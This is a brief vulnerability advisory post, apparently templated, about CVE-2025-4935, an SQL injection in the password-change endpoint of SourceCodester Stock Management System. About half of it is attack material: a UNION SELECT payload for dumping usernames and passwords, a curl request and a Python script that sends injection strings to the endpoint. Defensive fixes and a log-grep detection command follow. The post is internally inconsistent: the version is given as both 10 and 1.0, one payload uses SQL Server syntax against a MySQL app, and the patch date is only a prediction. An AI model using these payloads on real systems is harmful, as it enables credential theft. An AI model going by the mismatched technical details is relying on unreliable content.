SourceCodester Stock Management System 10, SQL Injection, CVE-2025-4935 (Critical)

Listen to this Post

How CVE-2025-4935 Works

The vulnerability exists in `/php_action/changePassword.php` due to improper sanitization of the `user_id` parameter. Attackers can inject malicious SQL queries through this parameter, manipulating database operations. The application fails to use prepared statements, allowing unauthorized access to sensitive data, including user credentials and inventory details. Remote exploitation is possible without authentication, making it critical. The SQL injection occurs during password change requests, where crafted payloads bypass input validation and execute arbitrary SQL commands.

DailyCVE Form

Platform: SourceCodester Stock Management System
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/28/2025

Prediction: Patch expected by 06/15/2025

What Undercode Say:

Exploitation

1. Craft SQL Payload:

user_id=1' UNION SELECT username,password FROM users-- -

2. Send Malicious Request:

curl -X POST -d "user_id=1' UNION SELECT 1,2,3-- -" http://target/php_action/changePassword.php

3. Extract Data:

import requests
payload = "1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))-- -"
r = requests.post("http://target/php_action/changePassword.php", data={"user_id": payload})
print(r.text)

Protection

1. Input Sanitization:

$user_id = mysqli_real_escape_string($conn, $_POST['user_id']);

2. Prepared Statements:

$stmt = $conn->prepare("UPDATE users SET password=? WHERE user_id=?");
$stmt->bind_param("si", $new_password, $user_id);

3. WAF Rules:

location ~ .php$ {
modsecurity_rules 'SecRule ARGS "@detectSQLi" "deny,log,status:403"';
}

4. Patch Verification:

grep -r "changePassword.php" /var/www/ | grep -i "prepare"

Analytics

  • Exploitability: High (Remote, No Auth)
  • Impact: Data Breach, System Compromise
  • Mitigation Priority: Immediate

Log Analysis

cat /var/log/apache2/access.log | grep "changePassword.php" | grep -E "UNION|SELECT|--"

References

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top